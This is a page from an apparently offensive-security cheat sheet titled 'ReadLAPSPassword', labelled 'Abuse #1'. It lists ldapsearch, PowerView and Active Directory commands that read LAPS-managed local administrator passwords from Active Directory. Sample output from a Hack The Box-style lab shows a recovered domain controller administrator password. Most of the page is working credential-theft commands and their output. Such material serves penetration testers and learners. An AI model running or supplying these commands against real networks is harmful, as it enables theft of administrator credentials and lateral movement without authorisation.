TLDRBins TLDRBins / ReadLAPSPassword

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Abuse #1: Read LAPS Password

ldapsearch -H ldap://<TARGET> -b 'DC=<EXAMPLE>,DC=<COM>' -x -D <USER>@<DOMAIN> -w '<PASSWORD>' '(ms-MCS-AdmPwd=*)' ms-MCS-AdmPwd

Sample Output:
$ ldapsearch -H ldap://10.10.10.240 -b 'DC=LicorDeBellota,DC=HTB' -x -D bob@LicorDeBellota.htb -w 'Test1234!@' '(ms-MCS-AdmPwd=*)' ms-MCS-AdmPwd
# extended LDIF
#
# LDAPv3
# base <DC=LicorDeBellota,DC=HTB> with scope subtree
# filter: (ms-MCS-AdmPwd=*)
# requesting: ms-MCS-AdmPwd 
#

# PIVOTAPI, Domain Controllers, LicorDeBellota.htb
dn: CN=PIVOTAPI,OU=Domain Controllers,DC=LicorDeBellota,DC=htb
ms-Mcs-AdmPwd: 2Vf5kP4Xvj5r605V616x

# search reference
ref: ldap://ForestDnsZones.LicorDeBellota.htb/DC=ForestDnsZones,DC=LicorDeBell
 ota,DC=htb

# search reference
ref: ldap://DomainDnsZones.LicorDeBellota.htb/DC=DomainDnsZones,DC=LicorDeBell
 ota,DC=htb

# search reference
ref: ldap://LicorDeBellota.htb/CN=Configuration,DC=LicorDeBellota,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3

1. Import PowerView

. .\PowerView.ps1

Sample Output:
*Evil-WinRM* PS C:\Users\bob\Documents> . .\PowerView.ps1

2. Create a cred object (runas) [optional]

$username = '<DOMAIN>\<USER>'

Sample Output:
TO-DO
$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force

Sample Output:
TO-DO
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $password

Sample Output:
TO-DO

3. Read LAPS password

Get-DomainComputer <TARGET_COMPUTER> -Properties ms-Mcs-AdmPwd

Sample Output:
TO-DO
# Or Active Directory Module
Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd -Credential $cred

Sample Output:
*Evil-WinRM* PS C:\Users\bob\Documents> Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd 


DistinguishedName : CN=PIVOTAPI,OU=Domain Controllers,DC=LicorDeBellota,DC=htb
DNSHostName       : PivotAPI.LicorDeBellota.htb
Enabled           : True
ms-Mcs-AdmPwd     : 2Vf5kP4Xvj5r605V616x
Name              : PIVOTAPI
ObjectClass       : computer
ObjectGUID        : 98783674-e6a3-4d9e-87e3-efe5f31fabbf
SamAccountName    : PIVOTAPI$
SID               : S-1-5-21-842165252-2479896602-2762773115-1004
UserPrincipalName :